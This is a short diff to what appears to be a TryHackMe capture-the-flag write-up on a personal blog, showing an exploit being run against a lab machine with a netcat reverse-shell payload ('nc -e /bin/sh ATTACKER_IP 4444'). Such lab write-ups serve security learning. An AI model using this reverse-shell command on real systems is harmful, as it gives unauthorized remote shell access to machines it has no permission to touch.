nisforrnicholas/nisforrnicholas.github.io/tryhackme/_posts/2021-12-15-tony_the_tiger.md

 ---

-We can use this exploit to launch a reverse shell on the target machine.
+We can use this exploit to launch a reverse shell on the target machine:

 ```
 python2 exploit.py 10.10.104.15:8080 'nc -e /bin/sh ATTACKER_IP 4444'